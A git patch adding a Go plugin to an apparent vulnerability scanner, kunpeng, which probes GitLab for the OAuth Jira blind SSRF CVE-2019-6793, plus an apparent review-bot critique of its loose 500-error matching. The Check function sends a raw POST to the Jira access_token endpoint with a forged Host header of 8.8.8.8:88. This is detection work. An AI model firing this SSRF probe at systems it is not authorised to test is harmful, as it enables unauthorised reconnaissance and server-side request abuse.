From 98215520c738030c9a2e06d8f8e29673d6f8dbee Mon Sep 17 00:00:00 2001
From: wolf
Date: Wed, 20 Mar 2019 21:44:23 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=20Gitlab=20OAuth=20Jira=20bl?=
 =?UTF-8?q?ind=20SSRF=E6=BC=8F=E6=B4=9E=E6=A3=80=E6=B5=8B=E6=8F=92?=
 =?UTF-8?q?=E4=BB=B6=20CVE-2019-6793?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 doc/plugin.md | 1 +
 plugin/go/gitlabOAuthSSRF.go | 54 ++++++++++++++++++++++++++++++++++++
 2 files changed, 55 insertions(+)
 create mode 100644 plugin/go/gitlabOAuthSSRF.go

diff --git a/doc/plugin.md b/doc/plugin.md
index d184db35..f3e50759 100644
--- a/doc/plugin.md
+++ b/doc/plugin.md
@@ -85,6 +85,7 @@
 | KP-0079 | ThinkPHP5 5.0.23 远程代码执行 | thinkphp | |[vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)|
 | KP-0080 | Apache Solr ConfigAPI 远程代码执行 | solr | CVE-2019-0192 ||
 | KP-0081 | Ruby on Rails 任意文件读取漏洞 | rails | CVE-2019-5418 |[vulhub](https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418)|
+| KP-0082 | Gitlab OAuth Jira blind SSRF | gitlab | CVE-2019-6793 ||
diff --git a/plugin/go/gitlabOAuthSSRF.go b/plugin/go/gitlabOAuthSSRF.go
new file mode 100644
index 00000000..1b70466a
--- /dev/null
+++ b/plugin/go/gitlabOAuthSSRF.go
@@ -0,0 +1,54 @@
+package goplugin
+
+import (
+ "net/url"
+ "strings"
+
+ "github.com/opensec-cn/kunpeng/plugin"
+ "github.com/opensec-cn/kunpeng/util"
+)
+
+type gitlabOAuthSSRF struct {
+ info plugin.Plugin
+ result []plugin.Plugin
+}
+
+func init() {
+ plugin.Regist("gitlab", &gitlabOAuthSSRF{})
+}
+func (d *gitlabOAuthSSRF) Init() plugin.Plugin {
+ d.info = plugin.Plugin{
+ Name: "Gitlab OAuth Jira blind SSRF",
+ Remarks: "Oauth :: Jira :: AuthorizationsController#access_token端点容易受到blind SSRF漏洞的攻击。 该漏洞允许攻击者在GitLab实例的网络中发出任意HTTP / HTTPS请求。",
+ Level: 2,
+ Type: "SSRF",
+ Author: "wolf",
+ References: plugin.References{
+ URL: "https://hackerone.com/reports/398799",
+ CVE: "CVE-2019-6793",
+ KPID: "KP-0082",
+ },
+ }
+ return d.info
+}
+func (d *gitlabOAuthSSRF) GetResult() []plugin.Plugin {
+ var result = d.result
+ d.result = []plugin.Plugin{}
+ return result
+}
+func (d *gitlabOAuthSSRF) Check(URL string, meta plugin.TaskMeta) bool {
+ requestStr := "POST /-/jira/login/oauth/access_token HTTP/1.1\r\nHost: 8.8.8.8:88\r\nConnection: close\r\n\r\n"
+ u, err := url.Parse(URL)
+ if err != nil {
+ return false
+ }
+ buf, err := util.TCPSend(u.Host, []byte(requestStr))
+ if err == nil && (strings.Contains(string(buf), "Something went wrong (500)")) {
+ result := d.info
+ result.Response = string(buf)
+ result.Request = requestStr
+ d.result = append(d.result, result)
+ return true
+ }
+ return false
+}
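Review bot: Check decides on nothing but the generic GitLab error text `Something went wrong (500)` in whatever util.TCPSend returns, so any unrelated 500 on /-/jira/login/oauth/access_token (or a 500 page served for the whole host) is recorded as CVE-2019-6793, while the probe is written as plain HTTP to u.Host regardless of u.Scheme, so an https:// target presumably fails at the TLS layer and is silently reported clean. If TCPSend returns the raw response, tighten the match to the status line as well, `if err == nil && strings.HasPrefix(string(buf), "HTTP/1.1 500") && strings.Contains(string(buf), "Something went wrong (500)") {`, and convert buf to a string once into a local rather than in three places. url.Parse also accepts a bare host with no scheme and then leaves u.Host empty, so add `if u.Host == "" { return false }` before the send instead of letting TCPSend receive an empty address. The reset in GetResult and the unused meta parameter look like interface conformance, but a doc comment on Check saying that the result is a blind, response-text-only indicator rather than a confirmed out-of-band request would help whoever triages the finding.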